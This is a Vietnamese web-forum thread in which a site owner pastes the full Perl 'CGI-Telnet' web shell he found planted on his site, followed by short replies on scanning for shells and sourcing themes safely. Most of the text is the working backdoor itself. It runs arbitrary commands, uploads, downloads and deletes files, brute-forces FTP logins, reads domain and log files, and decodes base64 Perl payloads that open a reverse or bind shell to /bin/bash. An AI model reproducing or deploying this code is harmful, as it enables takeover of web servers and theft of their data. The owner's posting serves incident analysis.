Help Shell ?

Thảo luận trong 'Installation, Upgrade, and Import Support' bắt đầu bởi dakhucquan.net, 11/12/2017.

  1. dakhucquan.net

    dakhucquan.net Thượng Đế

    Tham gia:
    27/06/2015
    Bài viết:
    312
    Đã được thích:
    133
    Điểm thành tích:
    43
    Giới tính:
    Nam
    Tìm ra được mail thằng up shell này ko các bác nhỉ?
    Cái web cùi bắp thôi mà ko biết nó chèn làm gì

    Mã:
    #!/usr/bin/perl -I/usr/local/bandmin
    use MIME::Base64;
    $Version= "CGI-Telnet Version 1.3";
    $EditPersion="MIsss";
    
    $Password = "svn";            # Change this. You will need to enter this
                    # to login.
    sub Is_Win(){
        $os = &trim($ENV{"SERVER_SOFTWARE"});
        if($os =~ m/win/i){
            return 1;
        }
        else{
            return 0;
        }
    }
    $WinNT = &Is_Win();                # You need to change the value of this to 1 if
                                    # you're running this script on a Windows NT
                                    # machine. If you're running it on Unix, you
                                    # can leave the value as it is.
    
    $NTCmdSep = "&";                # This character is used to seperate 2 commands
                                    # in a command line on Windows NT.
    
    $UnixCmdSep = ";";                # This character is used to seperate 2 commands
                                    # in a command line on Unix.
    
    $CommandTimeoutDuration = 10000;    # Time in seconds after commands will be killed
                                    # Don't set this to a very large value. This is
                                    # useful for commands that may hang or that
                                    # take very long to execute, like "find /".
                                    # This is valid only on Unix servers. It is
                                    # ignored on NT Servers.
    
    $ShowDynamicOutput = 1;            # If this is 1, then data is sent to the
                                    # browser as soon as it is output, otherwise
                                    # it is buffered and send when the command
                                    # completes. This is useful for commands like
                                    # ping, so that you can see the output as it
                                    # is being generated.
    
    # DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
    
    $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
    $CmdPwd = ($WinNT ? "cd" : "pwd");
    $PathSep = ($WinNT ? "\\" : "/");
    $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
    $cols= 150;
    $rows= 26;
    #------------------------------------------------------------------------------
    # Reads the input sent by the browser and parses the input variables. It
    # parses GET, POST and multipart/form-data that is used for uploading files.
    # The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
    # Other variables can be accessed using $in{'var'}, where var is the name of
    # the variable. Note: Most of the code in this function is taken from other CGI
    # scripts.
    #------------------------------------------------------------------------------
    sub ReadParse
    {
        local (*in) = @_ if @_;
        local ($i, $loc, $key, $val);
    
        $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
    
        if($ENV{'REQUEST_METHOD'} eq "GET")
        {
            $in = $ENV{'QUERY_STRING'};
        }
        elsif($ENV{'REQUEST_METHOD'} eq "POST")
        {
            binmode(STDIN) if $MultipartFormData & $WinNT;
            read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
        }
    
        # handle file upload data
        if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
        {
            $Boundary = '--'.$1; # please refer to RFC1867
            @list = split(/$Boundary/, $in);
            $HeaderBody = $list[1];
            $HeaderBody =~ /\r\n\r\n|\n\n/;
            $Header = $`;
            $Body = $';
             $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
            $in{'filedata'} = $Body;
            $Header =~ /filename=\"(.+)\"/;
            $in{'f'} = $1;
            $in{'f'} =~ s/\"//g;
            $in{'f'} =~ s/\s//g;
    
            # parse trailer
            for($i=2; $list[$i]; $i++)
            {
                $list[$i] =~ s/^.+name=$//;
                $list[$i] =~ /\"(\w+)\"/;
                $key = $1;
                $val = $';
                $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
                $val =~ s/%(..)/pack("c", hex($1))/ge;
                $in{$key} = $val;
            }
        }
        else # standard post data (url encoded, not multipart)
        {
            @in = split(/&/, $in);
            foreach $i (0 .. $#in)
            {
                $in[$i] =~ s/\+/ /g;
                ($key, $val) = split(/=/, $in[$i], 2);
                $key =~ s/%(..)/pack("c", hex($1))/ge;
                $val =~ s/%(..)/pack("c", hex($1))/ge;
                $in{$key} .= "\0" if (defined($in{$key}));
                $in{$key} .= $val;
            }
        }
    }
    
    #------------------------------------------------------------------------------
    # Prints the HTML Page Header
    # Argument 1: Form item name to which focus should be set
    #------------------------------------------------------------------------------
    sub PrintPageHeader
    {
        $EncodedCurrentDir = $CurrentDir;
        $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
        my $dir =$CurrentDir;
        $dir=~ s/\\/\\\\/g;
        print "Content-type: text/html\n\n";
        print <
    
    
    Edit by MIsss
    
    $HtmlMetaHeader
    
    
    
    
    
    
    $EditPersion $ENV{"SERVER_SOFTWARE"} Server IP: $ENV{'SERVER_ADDR'} | Your IP: $ENV{'REMOTE_ADDR'}
    Home | Command | GUI | Upload File | Download File | Back & Bind | Brute Forcer | Check Log | Domains/Users | Logout | Help
    END } #------------------------------------------------------------------------------ # Prints the Login Screen #------------------------------------------------------------------------------ sub PrintLoginScreen { print <
    
    
    Copyright (C) 2001 Rohitab Batra

    Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    ~\$ Connected !
    $ServerName~ Checking Server . . . . . . . . . . . . . . . . . . .
    $ServerName~ Trying connect to Command . . . . . . . . . . .
    $ServerName~\$ Connected Command!
    $ServerName~\$ OK! You can kill it!


    END } #------------------------------------------------------------------------------ # Add html special chars #------------------------------------------------------------------------------ sub HtmlSpecialChars($){ my $text = shift; $text =~ s/&/&/g; $text =~ s/"/"/g; $text =~ s/'/'/g; $text =~ s//>/g; return $text; } #------------------------------------------------------------------------------ # Add link for directory #------------------------------------------------------------------------------ sub AddLinkDir($) { my $ac=shift; my @dir=(); if($WinNT) { @dir=split(/\\/,$CurrentDir); }else { @dir=split("/",&trim($CurrentDir)); } my $path=""; my $result=""; foreach (@dir) { $path .= $_.$PathSep; $result.="".$_.$PathSep.""; } return $result; } #------------------------------------------------------------------------------ # Prints the message that informs the user of a failed login #------------------------------------------------------------------------------ sub PrintLoginFailedMessage { print <
    Login : Administrator
    Password:
    Login incorrect

    END } #------------------------------------------------------------------------------ # Prints the HTML form for logging in #------------------------------------------------------------------------------ sub PrintLoginForm { print < Login : Administrator
    Password: END } #------------------------------------------------------------------------------ # Prints the footer for the HTML Page #------------------------------------------------------------------------------ sub PrintPageFooter { print "
    o---[ Edit by $EditPersion ]---o
    "; } #------------------------------------------------------------------------------ # Retreives the values of all cookies. The cookies can be accesses using the # variable $Cookies{''} #------------------------------------------------------------------------------ sub GetCookies { @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'}); foreach $cookie(@httpcookies) { ($id, $val) = split(/=/, $cookie); $Cookies{$id} = $val; } } #------------------------------------------------------------------------------ # Prints the screen when the user logs out #------------------------------------------------------------------------------ sub PrintLogoutScreen { print "Connection closed by foreign host.

    "; } #------------------------------------------------------------------------------ # Logs out the user and allows the user to login again #------------------------------------------------------------------------------ sub PerformLogout { print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie &PrintPageHeader("p"); &PrintLogoutScreen; &PrintLoginScreen; &PrintLoginForm; &PrintPageFooter; exit; } #------------------------------------------------------------------------------ # This function is called to login the user. If the password matches, it # displays a page that allows the user to run commands. If the password doens't # match or if no password is entered, it displays a form that allows the user # to login #------------------------------------------------------------------------------ sub PerformLogin { if($LoginPassword eq $Password) # password matched { print "Set-Cookie: SAVEDPWD=$LoginPassword;\n"; &PrintPageHeader; print &ListDir; } else # password didn't match { &PrintPageHeader("p"); &PrintLoginScreen; if($LoginPassword ne "") # some password was entered { &PrintLoginFailedMessage; } &PrintLoginForm; &PrintPageFooter; exit; } } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to enter commands #------------------------------------------------------------------------------ sub PrintCommandLineInputForm { my $dir= "".&AddLinkDir("command").""; $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return <
    $Prompt
    END } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to download files #------------------------------------------------------------------------------ sub PrintFileDownloadForm { my $dir = &AddLinkDir("download"); $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return <
    $Prompt download

    Filename:

    Download:
    END } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to upload files #------------------------------------------------------------------------------ sub PrintFileUploadForm { my $dir= &AddLinkDir("upload"); $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return <
    $Prompt upload

    Filename:

    Options:  

    Upload:   
    END } #------------------------------------------------------------------------------ # This function is called when the timeout for a command expires. We need to # terminate the script immediately. This function is valid only on Unix. It is # never called when the script is running on NT. #------------------------------------------------------------------------------ sub CommandTimeout { if(!$WinNT) { alarm(0); return <
    Command exceeded maximum time of $CommandTimeoutDuration second(s).
    Killed it! END } } #------------------------------------------------------------------------------ # This function displays the page that contains a link which allows the user # to download the specified file. The page also contains a auto-refresh # feature that starts the download automatically. # Argument 1: Fully qualified filename of the file to be downloaded #------------------------------------------------------------------------------ sub PrintDownloadLinkPage { local($FileUrl) = @_; my $result=""; if(-e $FileUrl) # if the file exists { # encode the file link so we can send it to the browser $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go"; $HtmlMetaHeader = ""; &PrintPageHeader("c"); $result .= <
    If the download does not start automatically, Click Here END $result .= &PrintCommandLineInputForm; } else # file doesn't exist { $result .= "Failed to download $FileUrl: $!"; $result .= &PrintFileDownloadForm; } return $result; } #------------------------------------------------------------------------------ # This function reads the specified file from the disk and sends it to the # browser, so that it can be downloaded by the user. # Argument 1: Fully qualified pathname of the file to be sent. #------------------------------------------------------------------------------ sub SendFileToBrowser { my $result = ""; local($SendFile) = @_; if(open(SENDFILE, $SendFile)) # file opened for reading { if($WinNT) { binmode(SENDFILE); binmode(STDOUT); } $FileSize = (stat($SendFile))[7]; ($Filename = $SendFile) =~ m!([^/^\\]*)$!; print "Content-Type: application/x-unknown\n"; print "Content-Length: $FileSize\n"; print "Content-Disposition: attachment; filename=$1\n\n"; print while(); close(SENDFILE); exit(1); } else # failed to open file { $result .= "Failed to download $SendFile: $!"; $result .=&PrintFileDownloadForm; } return $result; } #------------------------------------------------------------------------------ # This function is called when the user downloads a file. It displays a message # to the user and provides a link through which the file can be downloaded. # This function is also called when the user clicks on that link. In this case, # the file is read and sent to the browser. #------------------------------------------------------------------------------ sub BeginDownload { # get fully qualified path of the file to be downloaded if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute { $TargetFile = $TransferFile; } else # path is relative { chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; $TargetFile .= $PathSep.$TransferFile; } if($Options eq "go") # we have to send the file { &SendFileToBrowser($TargetFile); } else # we have to send only the link page { &PrintDownloadLinkPage($TargetFile); } } #------------------------------------------------------------------------------ # This function is called when the user wants to upload a file. If the # file is not specified, it displays a form allowing the user to specify a # file, otherwise it starts the upload process. #------------------------------------------------------------------------------ sub UploadFile { # if no file is specified, print the upload form again if($TransferFile eq "") { return &PrintFileUploadForm; } my $result=""; # start the uploading process $result .= "Uploading $TransferFile to $CurrentDir...
    "; # get the fullly qualified pathname of the file to be created chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/; $TransferFile =~ m!([^/^\\]*)$!; $TargetName .= $PathSep.$1; $TargetFileSize = length($in{'filedata'}); # if the file exists and we are not supposed to overwrite it if(-e $TargetName && $Options ne "overwrite") { $result .= "Failed: Destination file already exists.
    "; } else # file is not present { if(open(UPLOADFILE, ">$TargetName")) { binmode(UPLOADFILE) if $WinNT; print UPLOADFILE $in{'filedata'}; close(UPLOADFILE); $result .= "Transfered $TargetFileSize Bytes.
    "; $result .= "File Path: $TargetName
    "; } else { $result .= "Failed: $!
    "; } } $result .= &PrintCommandLineInputForm; return $result; } #------------------------------------------------------------------------------ # This function is called when the user wants to download a file. If the # filename is not specified, it displays a form allowing the user to specify a # file, otherwise it displays a message to the user and provides a link # through which the file can be downloaded. #------------------------------------------------------------------------------ sub DownloadFile { # if no file is specified, print the download form again if($TransferFile eq "") { &PrintPageHeader("f"); return &PrintFileDownloadForm; } # get fully qualified path of the file to be downloaded if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute { $TargetFile = $TransferFile; } else # path is relative { chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; $TargetFile .= $PathSep.$TransferFile; } if($Options eq "go") # we have to send the file { return &SendFileToBrowser($TargetFile); } else # we have to send only the link page { return &PrintDownloadLinkPage($TargetFile); } } #------------------------------------------------------------------------------ # This function is called to execute commands. It displays the output of the # command and allows the user to enter another command. The change directory # command is handled differently. In this case, the new directory is stored in # an internal variable and is used each time a command has to be executed. The # output of the change directory command is not displayed to the users # therefore error messages cannot be displayed. #------------------------------------------------------------------------------ sub ExecuteCommand { my $result=""; if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command { # we change the directory internally. The output of the # command is not displayed. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd; chop($CurrentDir = `$Command`); $result .= &PrintCommandLineInputForm; $result .= "Command: $RunCommand
    "; return $result; } #------------------------------------------------------------------------ # run command #------------------------------------------------------------------------ sub RunCmd { my $result=""; $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector; if(!$WinNT) { $SIG{'ALRM'} = \&CommandTimeout; alarm($CommandTimeoutDuration); } if($ShowDynamicOutput) # show output as it is generated { $|=1; $Command .= " |"; open(CommandOutput, $Command); while() { $_ =~ s/(\n|\r\n)$//; $result .= &HtmlSpecialChars("$_\n"); } $|=0; } else # show output after command completes { $result .= &HtmlSpecialChars('$Command'); } if(!$WinNT) { alarm(0); } return $result; } #============================================================================== # Form Save File #============================================================================== sub SaveFileForm { my $result =""; substr($RunCommand,0,5)=""; my $file=&trim($RunCommand); $save='
    '; $File=$CurrentDir.$PathSep.$RunCommand; my $dir="".&AddLinkDir("gui").""; if(-w $File) { $rows="23" }else { $msg="
    Permission denied!
    "; $rows="20" } $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; $read=($WinNT)?"type":"less"; $RunCommand = "$read \"$RunCommand\""; $result .= <
    $Prompt
    Command: $RunCommand $save
    $msg
    "; $result .= "
    "; return $result; } #============================================================================== # Save File #============================================================================== sub SaveFile($) { my $Data= shift ; my $File= shift; $File=$CurrentDir.$PathSep.$File; if(open(FILE, ">$File")) { binmode FILE; print FILE $Data; close FILE; return 1; }else { return 0; } } #------------------------------------------------------------------------------ # Brute Forcer Form #------------------------------------------------------------------------------ sub BruteForcerForm { my $result=""; $result .= <
    ####################################
    Simple FTP brute forcer
    ####################################
    User:
    Pass:
    Sleep:
END return $result; } #------------------------------------------------------------------------------ # Brute Forcer #------------------------------------------------------------------------------ sub BruteForcer { my $result=""; $Server=$ENV{'SERVER_ADDR'}; if($in{'user'} eq "") { $result .= &BruteForcerForm; }else { use Net::FTP; @user= split(/\n/, $in{'user'}); @pass= split(/\n/, $in{'pass'}); chomp(@user); chomp(@pass); $result .= "

[+] Trying brute $ServerName
====================>>>>>>>>>>>><<<<<<<<<<====================

\n"; foreach $username (@user) { if(!($username eq "")) { foreach $password (@pass) { $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n"; if($ftp->login("$username","$password")) { $result .= "[+] ftp://$username:$password\@$Server
\n"; $ftp->quit(); break; } if(!($in{'sleep'} eq "0")) { sleep(int($in{'sleep'})); } $ftp->quit(); } } } $result .= "\n
==========>>>>>>>>>> Finished <<<<<<<<<<==========
\n"; } return $result; } #------------------------------------------------------------------------------ # Backconnect Form #------------------------------------------------------------------------------ sub BackBindForm { return <

BackConnect: Host: Port:
[+] Client listen before connect back!
[+] Try check your Port with http://www.canyouseeme.org/
[+] Client listen with command: nc -vv -l -p 80


Bind Port: Port: Password:
[+] Chuc nang chua dc test!
[+] Try command: nc $ENV{'SERVER_ADDR'} 1412

END } #------------------------------------------------------------------------------ # Backconnect use perl #------------------------------------------------------------------------------ sub BackBind { use MIME::Base64; use Socket; $backperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7"; $bindperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJEFSR0M9QEFSR1Y7DQokcG9ydAk9ICRBUkdWWzBdOw0KJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0KJFNoZWxsCT0gIi9iaW4vYmFzaCI7DQpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKW9yIGRpZSAic29ja2V0OiQhIjsNCnNldHNvY2tvcHQoU0VSVkVSLCBTT0xfU09DS0VULCBTT19SRVVTRUFERFIsIHBhY2soImwiLCAxKSlvciBkaWUgInNldHNvY2tvcHQ6ICQhIjsNCmJpbmQoU0VSVkVSLCBzb2NrYWRkcl9pbigkcG9ydCwgSU5BRERSX0FOWSkpb3IgZGllICJiaW5kOiAkISI7DQpsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pCQlvciBkaWUgImxpc3RlbjogJCEiOw0KZm9yKDsgJHBhZGRyID0gYWNjZXB0KENMSUVOVCwgU0VSVkVSKTsgY2xvc2UgQ0xJRU5UKQ0Kew0KCW9wZW4oU1RESU4sICI+JkNMSUVOVCIpOw0KCW9wZW4oU1RET1VULCAiPiZDTElFTlQiKTsNCglvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7DQoJc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gJ1srXSBTeXN0ZW1pbmZvOiAnOyB1bmFtZSAtYTtlY2hvO2VjaG8gJ1srXSBVc2VyaW5mbzogJzsgaWQ7ZWNobztlY2hvICdbK10gRGlyZWN0b3J5OiAnOyBwd2Q7ZWNobzsgZWNobyAnWytdIFNoZWxsOiAnOyRTaGVsbCIpOw0KCWNsb3NlKFNURElOKTsNCgljbG9zZShTVERPVVQpOw0KCWNsb3NlKFNUREVSUik7DQp9DQo="; $ClientAddr = $in{'clientaddr'}; $ClientPort = int($in{'clientport'}); if($ClientPort eq 0) { return &BackBindForm; }elsif(!$ClientAddr eq "") { $Data=decode_base64($backperl); if(-w "/tmp/") { $File="/tmp/backconnect.pl"; }else { $File=$CurrentDir.$PathSep."backconnect.pl"; } open(FILE, ">$File"); print FILE $Data; close FILE; system("perl backconnect.pl $ClientAddr $ClientPort"); unlink($File); exit 0; }else { $Data=decode_base64($bindperl); if(-w "/tmp") { $File="/tmp/bindport.pl"; }else { $File=$CurrentDir.$PathSep."bindport.pl"; } open(FILE, ">$File"); print FILE $Data; close FILE; system("perl bindport.pl $ClientPort"); unlink($File); exit 0; } } #------------------------------------------------------------------------------ # Array List Directory #------------------------------------------------------------------------------ sub RmDir($) { my $dir = shift; if(opendir(DIR,$dir)) { while($file = readdir(DIR)) { if(($file ne ".") && ($file ne "..")) { $file= $dir.$PathSep.$file; if(-d $file) { &RmDir($file); } else { unlink($file); } } } closedir(DIR); } if(!rmdir($dir)) { } } sub FileOwner($) { my $file = shift; if(-e $file) { ($uid,$gid) = (stat($file))[4,5]; if($WinNT) { return "???"; } else { $name=getpwuid($uid); $group=getgrgid($gid); return $name."/".$group; } } return "???"; } sub ParentFolder($) { my $path = shift; my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd; chop($path = `$Comm`); return $path; } sub FilePerms($) { my $file = shift; my $ur = "-"; my $uw = "-"; if(-e $file) { if($WinNT) { if(-r $file){ $ur = "r"; } if(-w $file){ $uw = "w"; } return $ur . " / " . $uw; }else { $mode=(stat($file))[2]; $result = sprintf("%04o", $mode & 07777); return $result; } } return "0000"; } sub FileLastModified($) { my $file = shift; if(-e $file) { ($la) = (stat($file))[9]; ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1]; $y = $y + 1900; @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/; $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i); return $lmtime; } return "???"; } sub FileSize($) { my $file = shift; if(-f $file) { return -s $file; } return "0"; } sub ParseFileSize($) { my $size = shift; if($size <= 1024) { return $size. " B"; } else { if($size <= 1024*1024) { $size = sprintf("%.02f",$size / 1024); return $size." KB"; } else { $size = sprintf("%.2f",$size / 1024 / 1024); return $size." MB"; } } } sub trim($) { my $string = shift; $string =~ s/^\s+//; $string =~ s/\s+$//; return $string; } sub AddSlashes($) { my $string = shift; $string=~ s/\\/\\\\/g; return $string; } sub ListDir { my $path = $CurrentDir.$PathSep; $path=~ s/\\\\/\\/g; my $result = "
Path: [ ".&AddLinkDir("gui")." ]
"; if(-d $path) { my @fname = (); my @dname = (); if(opendir(DIR,$path)) { while($file = readdir(DIR)) { $f=$path.$file; if(-d $f) { push(@dname,$file); } else { push(@fname,$file); } } closedir(DIR); } @fname = sort { lc($a) cmp lc($b) } @fname; @dname = sort { lc($a) cmp lc($b) } @dname; $result .= "
"; my $style="line"; my $i=0; foreach my $d (@dname) { $style= ($style eq "line") ? "notline": "line"; $d = &trim($d); $dirname=$d; if($d eq "..") { $d = &ParentFolder($path); } elsif($d eq ".") { $d = $path; } else { $d = $path.$d; } $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $i++; } foreach my $f (@fname) { $style= ($style eq "line") ? "notline": "line"; $file=$f; $f = $path.$f; $view = "?dir=".$path."&view=".$f; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $i++; } $result .= "
File Name File Size Owner Permission Last Modified Action
[ ".$dirname." ]DIR".&FileOwner($d)."".&FilePerms($d)."".&FileLastModified($d)."Rename | Remove
".$file."".&ParseFileSize(&FileSize($f))."".&FileOwner($f)."".&FilePerms($f)."".&FileLastModified($f)."Edit | Rename | Download | Remove
"; } return $result; } #------------------------------------------------------------------------------ # Try to View List User #------------------------------------------------------------------------------ sub ViewDomainUser { open (domains, '/etc/named.conf') or $err=1; my @cnzs = ; close d0mains; my $style="line"; my $result="
Hoang Sa - Truong Sa
"; if ($err) { $result .= ('

C0uldn\'t Bypass it , Sorry

'); return $result; }else { $result .= ''; } foreach my $one (@cnzs) { if($one =~ m/.*?zone "(.*?)" {/) { $style= ($style eq "line") ? "notline": "line"; $filename= "/etc/valiases/".$one; $owner = getpwuid((stat($filename))[4]); $result .= ''; } } $result .= '
Domains User
'.$one.' '.$owner.'
'; return $result; } #------------------------------------------------------------------------------ # View Log #------------------------------------------------------------------------------ sub ViewLog { if($WinNT) { return "

Don't run on Windows

"; } my $result=""; my @pathlog=( '/usr/local/apache/logs/error_log', '/var/log/httpd/error_log', '/usr/local/apache/logs/access_log' ); my $i=0; my $perms; my $sl; foreach my $log (@pathlog) { if(-w $log) { $perms="OK"; }else { chop($sl = `ln -s $log error_log_$i`); if(&trim($ls) eq "") { if(-r $ls) { $perms="OK"; $log="error_log_".$i; } }else { $perms="Cancel"; } } $result .=< END $i++; } $result .="
Path LogSubmit
$perms
"; return $result; } #------------------------------------------------------------------------------ # Main Program - Execution Starts Here #------------------------------------------------------------------------------ &ReadParse; &GetCookies; $ScriptLocation = $ENV{'SCRIPT_NAME'}; $ServerName = $ENV{'SERVER_NAME'}; $LoginPassword = $in{'p'}; $RunCommand = $in{'c'}; $TransferFile = $in{'f'}; $Options = $in{'o'}; $Action = $in{'a'}; $Action = "command" if($Action eq ""); # no action specified, use default # get the directory in which the commands will be executed $CurrentDir = &trim($in{'d'}); # mac dinh xuat thong tin neu ko co lenh nao! $RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq ""); chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq ""); $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password; if($Action eq "login" || !$LoggedIn) # user needs/has to login { &PerformLogin; }elsif($Action eq "gui") # GUI directory { &PrintPageHeader; if(!$WinNT) { $chmod=int($in{'chmod'}); if(!($chmod eq 0)) { $chmod=int($in{'chmod'}); $file=$CurrentDir.$PathSep.$TransferFile; chop($result= `chmod $chmod "$file"`); if(&trim($result) eq "") { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } } $rename=$in{'rename'}; if(!$rename eq "") { if(rename($TransferFile,$rename)) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } $remove=$in{'remove'}; if($remove ne "") { $rm = $CurrentDir.$PathSep.$remove; if(-d $rm) { &RmDir($rm); }else { if(unlink($rm)) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } } print &ListDir; } elsif($Action eq "command") # user wants to run a command { &PrintPageHeader("c"); print &ExecuteCommand; } elsif($Action eq "save") # user wants to save a file { &PrintPageHeader; if(&SaveFile($in{'data'},$in{'file'})) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } print &ListDir; } elsif($Action eq "upload") # user wants to upload a file { &PrintPageHeader; print &UploadFile; } elsif($Action eq "backbind") # user wants to back connect or bind port { &PrintPageHeader("clientport"); print &BackBind; } elsif($Action eq "bruteforcer") # user wants to brute force { &PrintPageHeader; print &BruteForcer; }elsif($Action eq "download") # user wants to download a file { print &DownloadFile; }elsif($Action eq "checklog") # user wants to view log file { &PrintPageHeader; print &ViewLog; }elsif($Action eq "domainsuser") # user wants to view list user/domain { &PrintPageHeader; print &ViewDomainUser; }elsif($Action eq "logout") # user wants to logout { &PerformLogout; } &PrintPageFooter;
 
Chỉnh sửa cuối: 11/12/2017
THB thích bài này.
  • tuna

    tuna Thượng Đế

    Tham gia:
    30/01/2017
    Bài viết:
    641
    Đã được thích:
    246
    Điểm thành tích:
    43
    Giới tính:
    Nam
    Làm sao để biết bị dính shell vậy bác?
     
    THB thích bài này.
  • dakhucquan.net

    dakhucquan.net Thượng Đế

    Tham gia:
    27/06/2015
    Bài viết:
    312
    Đã được thích:
    133
    Điểm thành tích:
    43
    Giới tính:
    Nam
    quét
     
    THB thích bài này.
  • THB

    THB Admin - Founder Thành viên BQT

    Tham gia:
    25/02/2015
    Bài viết:
    6,336
    Đã được thích:
    3,550
    Điểm thành tích:
    113
    Giới tính:
    Nam
    Nghề nghiệp:
    CEO
    Nơi ở:
    Bình Dương
    Web:
    cái này bác @vanphu113 vào xem sao? mình chịu thua. hii. Kiến thức có hạn.
     
  • ngaithon

    ngaithon Thượng Đế

    Tham gia:
    13/02/2017
    Bài viết:
    112
    Đã được thích:
    23
    Điểm thành tích:
    18
    Giới tính:
    Nam
    Quét thế nào vậy bác. Cho e xin cách quét ạ
     
    THB thích bài này.
  • aviaiva

    aviaiva Thượng Đế

    Tham gia:
    01/03/2016
    Bài viết:
    339
    Đã được thích:
    265
    Điểm thành tích:
    63
    Nơi ở:
    hn
    Web:
    code quét cứ xuất hiện Base64 thì coi như có shell trong code, nhưng điều đó không phải lúc nào cũng đúng, cái này giờ ai cũng biết rồi nên chỉ có gà mờ nó mới chèn shell kiểu đó.
    Nếu trang bạn không mang lại lợi nhuận cho hacker thì nó chả thèm mò vào, trừ phi bạn tự rước nó vào khi sử dụng code bên ngoài, style, mã nguồn chia sẻ lung tung trên mạng.
    nói thật tin nhau là chính + nghèo ít tiền nên làm liều, chứ có mấy ai làm forum am hiểu hết về code đâu.
    tốt nhất là tìm diễn đàn uy tín kiểu như vnxf để lấy style, addon, mã nguồn xen, nếu có dính phốt thì tỉ lệ cũng thấp hơn mấy trang khác
     
    THB thích bài này.
  • ngaithon

    ngaithon Thượng Đế

    Tham gia:
    13/02/2017
    Bài viết:
    112
    Đã được thích:
    23
    Điểm thành tích:
    18
    Giới tính:
    Nam
    E
    E toàn lấy ở vnxf mà cũng ko biết có bị dính ko nữa.
     
    THB thích bài này.
  • aviaiva

